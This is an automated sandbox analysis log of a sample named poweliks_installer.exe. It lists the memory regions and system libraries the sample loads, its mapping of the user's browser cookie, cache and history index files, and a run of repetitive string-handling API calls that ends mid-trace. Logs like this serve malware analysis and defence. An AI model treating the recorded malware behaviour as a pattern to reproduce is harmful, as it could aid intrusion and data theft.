# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Aug 21 2017 12:23:07 # Log Creation Date: 21.08.2017 15:58:57.498 Process: id = "1" image_name = "poweliks_installer.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\poweliks_installer.exe" page_root = "0x66c58000" os_pid = "0xa00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010611" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 7 start_va = 0x400000 end_va = 0x414fff entry_point = 0x400000 region_type = mapped_file name = "poweliks_installer.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\poweliks_installer.exe") Region: id = 8 start_va = 0x77380000 end_va = 0x77528fff entry_point = 0x77380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9 start_va = 0x77560000 end_va = 0x776dffff entry_point = 0x77560000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 11 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 12 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 13 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 14 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 149 start_va = 0x240000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 150 start_va = 0x73a70000 end_va = 0x73acbfff entry_point = 0x73a70000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 151 start_va = 0x73ad0000 end_va = 0x73b0efff entry_point = 0x73ad0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 152 start_va = 0x73b40000 end_va = 0x73b47fff entry_point = 0x73b40000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 153 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 154 start_va = 0x75320000 end_va = 0x75365fff entry_point = 0x75320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 155 start_va = 0x765b0000 end_va = 0x766bffff entry_point = 0x765b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 156 start_va = 0x77160000 end_va = 0x77259fff entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 157 start_va = 0x77260000 end_va = 0x7737efff entry_point = 0x0 region_type = private name = "private_0x0000000077260000" filename = "" Region: id = 158 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 159 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 160 start_va = 0x750b0000 end_va = 0x750bbfff entry_point = 0x750b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 161 start_va = 0x750c0000 end_va = 0x7511ffff entry_point = 0x750c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 162 start_va = 0x75120000 end_va = 0x7521ffff entry_point = 0x75120000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 163 start_va = 0x75240000 end_va = 0x75258fff entry_point = 0x75240000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 164 start_va = 0x75260000 end_va = 0x7530bfff entry_point = 0x75260000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 165 start_va = 0x753c0000 end_va = 0x754affff entry_point = 0x753c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 166 start_va = 0x754e0000 end_va = 0x7556ffff entry_point = 0x754e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 167 start_va = 0x76750000 end_va = 0x76759fff entry_point = 0x76750000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 168 start_va = 0x76760000 end_va = 0x767fffff entry_point = 0x76760000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 169 start_va = 0x76b30000 end_va = 0x76bccfff entry_point = 0x76b30000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 170 start_va = 0x77100000 end_va = 0x77156fff entry_point = 0x77100000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 171 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 172 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 173 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 174 start_va = 0x750000 end_va = 0x8d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 175 start_va = 0x76a00000 end_va = 0x76acbfff entry_point = 0x76a00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 176 start_va = 0x76ad0000 end_va = 0x76b2ffff entry_point = 0x76ad0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 177 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 178 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 179 start_va = 0x8e0000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 180 start_va = 0xa70000 end_va = 0x1e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 181 start_va = 0x1e70000 end_va = 0x213efff entry_point = 0x1e70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 182 start_va = 0x210000 end_va = 0x224fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 183 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 184 start_va = 0x2c0000 end_va = 0x2c3fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 185 start_va = 0x2d0000 end_va = 0x2d6fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 186 start_va = 0x75380000 end_va = 0x753b4fff entry_point = 0x75380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 187 start_va = 0x76bd0000 end_va = 0x76bd5fff entry_point = 0x76bd0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 188 start_va = 0x2e0000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 189 start_va = 0x76470000 end_va = 0x765a5fff entry_point = 0x76470000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 190 start_va = 0x76be0000 end_va = 0x76cd4fff entry_point = 0x76be0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 191 start_va = 0x76d30000 end_va = 0x76f2afff entry_point = 0x76d30000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 192 start_va = 0x75570000 end_va = 0x756cbfff entry_point = 0x75570000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 193 start_va = 0x763e0000 end_va = 0x7646efff entry_point = 0x763e0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 194 start_va = 0x768e0000 end_va = 0x769fcfff entry_point = 0x768e0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 195 start_va = 0x77530000 end_va = 0x7753bfff entry_point = 0x77530000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 196 start_va = 0x75790000 end_va = 0x763d9fff entry_point = 0x75790000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 197 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 198 start_va = 0x74e10000 end_va = 0x74fadfff entry_point = 0x74e10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 199 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 200 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 201 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 202 start_va = 0x74e00000 end_va = 0x74e0afff entry_point = 0x74e00000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 203 start_va = 0x2e0000 end_va = 0x2ebfff entry_point = 0x2e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 204 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 205 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x2f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 206 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x340000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 207 start_va = 0x350000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 208 start_va = 0x5c0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 209 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 210 start_va = 0x74dd0000 end_va = 0x74df0fff entry_point = 0x74dd0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 211 start_va = 0x76ce0000 end_va = 0x76d24fff entry_point = 0x76ce0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 212 start_va = 0x74d80000 end_va = 0x74dc3fff entry_point = 0x74d80000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 213 start_va = 0x2140000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 214 start_va = 0x74d60000 end_va = 0x74d7bfff entry_point = 0x74d60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 215 start_va = 0x74d50000 end_va = 0x74d56fff entry_point = 0x74d50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 216 start_va = 0x74d10000 end_va = 0x74d4bfff entry_point = 0x74d10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 217 start_va = 0x2140000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 218 start_va = 0x2230000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 219 start_va = 0x74d00000 end_va = 0x74d04fff entry_point = 0x74d00000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 220 start_va = 0x74cf0000 end_va = 0x74cfffff entry_point = 0x74cf0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 221 start_va = 0x420000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 222 start_va = 0x2270000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 223 start_va = 0x74ce0000 end_va = 0x74ceffff entry_point = 0x74ce0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 224 start_va = 0x74cc0000 end_va = 0x74cd1fff entry_point = 0x74cc0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 225 start_va = 0x74cb0000 end_va = 0x74cb7fff entry_point = 0x74cb0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 226 start_va = 0x74c70000 end_va = 0x74ca7fff entry_point = 0x74c70000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 227 start_va = 0x2370000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 228 start_va = 0x74c60000 end_va = 0x74c65fff entry_point = 0x74c60000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 229 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 230 start_va = 0x738b0000 end_va = 0x7392ffff entry_point = 0x738b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 231 start_va = 0x2270000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 232 start_va = 0x2360000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 233 start_va = 0x2480000 end_va = 0x255efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 234 start_va = 0x390000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 235 start_va = 0x3a0000 end_va = 0x3a4fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 236 start_va = 0x3b0000 end_va = 0x3b5fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 237 start_va = 0x3c0000 end_va = 0x3c7fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 238 start_va = 0x3d0000 end_va = 0x3e2fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 239 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 240 start_va = 0x756d0000 end_va = 0x75752fff entry_point = 0x756d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 241 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 242 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 243 start_va = 0x74c30000 end_va = 0x74c59fff entry_point = 0x74c30000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 244 start_va = 0x74c20000 end_va = 0x74c28fff entry_point = 0x74c20000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 245 start_va = 0x74bc0000 end_va = 0x74c1efff entry_point = 0x74bc0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 246 start_va = 0x430000 end_va = 0x444fff entry_point = 0x4313f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 247 start_va = 0x450000 end_va = 0x464fff entry_point = 0x4513f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 248 start_va = 0x74a70000 end_va = 0x74b21fff entry_point = 0x74a70000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\SysWOW64\\jscript.dll" (normalized: "c:\\windows\\syswow64\\jscript.dll") Region: id = 681 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 682 start_va = 0x6c0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 683 start_va = 0x2560000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 684 start_va = 0x2660000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 685 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 686 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Thread: id = 1 os_tid = 0xa04 [0012.781] IsCharSpaceW (wch=0x38) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.781] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.781] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] 